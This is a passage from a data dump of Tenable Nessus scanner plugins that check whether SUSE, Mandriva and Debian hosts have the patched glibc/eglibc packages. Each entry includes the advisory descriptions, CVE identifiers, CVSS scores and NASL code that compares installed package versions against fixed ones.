attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f66ba9d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11 SP1 LTSS :\n\nzypper in -t patch slessp1-glibc-10217\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-devel-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-html-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-i18ndata-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-info-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-locale-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-profile-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"nscd-2.11.1-0.62.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:55:17", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been found and corrected in glibc :\n\nWhen converting IBM930 code with iconv(), if IBM930 code which\nincludes invalid multibyte character 0xffff is specified, then iconv()\nsegfaults (CVE-2012-6656).\n\nOff-by-one error in the __gconv_translit_find function in\ngconv_trans.c in GNU C Library (aka glibc) allows context-dependent\nattackers to cause a denial of service (crash) or execute arbitrary\ncode via vectors related to the CHARSET environment variable and gconv\ntransliteration modules (CVE-2014-5119).\n\nCrashes were reported in the IBM code page decoding functions (IBM933,\nIBM935, IBM937, IBM939, IBM1364) (CVE-2014-6040).\n\nThe updated packages have been patched to correct these issues.", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2014-175.NASL", "href": "https://www.tenable.com/plugins/nessus/77654", "published": "2014-09-12T00:00:00", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2014:175)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:175. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77654);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(68983, 69470, 69472);\n script_xref(name:\"MDVSA\", value:\"2014:175\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2014:175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in glibc :\n\nWhen converting IBM930 code with iconv(), if IBM930 code which\nincludes invalid multibyte character 0xffff is specified, then iconv()\nsegfaults (CVE-2012-6656).\n\nOff-by-one error in the __gconv_translit_find function in\ngconv_trans.c in GNU C Library (aka glibc) allows context-dependent\nattackers to cause a denial of service (crash) or execute arbitrary\ncode via vectors related to the CHARSET environment variable and gconv\ntransliteration modules (CVE-2014-5119).\n\nCrashes were reported in the IBM code page decoding functions (IBM933,\nIBM935, IBM937, IBM939, IBM1364) (CVE-2014-6040).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/oss-sec/2014/q3/485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1135841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=14134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=17325\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-devel-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-pdf-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-i18ndata-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-profile-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-static-devel-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-utils-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nscd-2.14.1-12.9.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "glibc has been updated to fix security issues :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656, bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043,\n bsc#882600, BZ #17048)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0170-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83675", "published": "2015-05-20T00:00:00", "title": "SUSE SLES10 Security Update : glibc (SUSE-SU-2015:0170-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0170-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83675);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-4043\", \"CVE-2014-6040\");\n script_bugtraq_id(67992, 68006, 69470, 69472);\n\n script_name(english:\"SUSE SLES10 Security Update : glibc (SUSE-SU-2015:0170-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix security issues :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656, bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043,\n bsc#882600, BZ #17048)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=844309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=882600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894556\"\n );\n # https://download.suse.com/patch/finder/?keywords=1ccbe69cba5cc8835258525263c85657\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?18c9278a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4357/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150170-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dcd4c243\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-devel-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-html-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-i18ndata-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-info-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-locale-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-profile-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"nscd-2.4-31.115.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:20:52", "bulletinFamily": "scanner", "description": "CVE-2012-6656\n\nFix validation check when converting from ibm930 to utf. When\nconverting IBM930 code with iconv(), if IBM930 code which includes\ninvalid multibyte character ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-97.NASL", "href": "https://www.tenable.com/plugins/nessus/82242", "published": "2015-03-26T00:00:00", "title": "Debian DLA-97-1 : eglibc security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-97-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82242);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/09 14:30:25\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\");\n script_bugtraq_id(69470, 69472, 71216);\n\n script_name(english:\"Debian DLA-97-1 : eglibc security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2012-6656\n\nFix validation check when converting from ibm930 to utf. When\nconverting IBM930 code with iconv(), if IBM930 code which includes\ninvalid multibyte character '0xffff' is specified, then iconv()\nsegfaults.\n\nCVE-2014-6040\n\nCrashes on invalid input in IBM gconv modules [BZ #17325] These\nchanges are based on the fix for BZ #14134 in commit\n6e230d11837f3ae7b375ea69d7905f0d18eb79e5.\n\nCVE-2014-7817\n\nThe function wordexp() fails to properly handle the WRDE_NOCMD flag\nwhen processing arithmetic inputs in the form of '$((... ``))' where\n'...' can be anything valid. The backticks in the arithmetic\nepxression are evaluated by in a shell even if WRDE_NOCMD forbade\ncommand substitution. This allows an attacker to attempt to pass\ndangerous commands via constructs of the above form, and bypass the\nWRDE_NOCMD flag. This patch fixes this by checking for WRDE_NOCMD in\nexec_comm(), the only place that can execute a shell. All other checks\nfor WRDE_NOCMD are superfluous and removed.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2014/11/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/eglibc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-dev-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-prof\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-dns-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-files-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"eglibc-source\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"glibc-doc\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-bin\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-dev-bin\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", 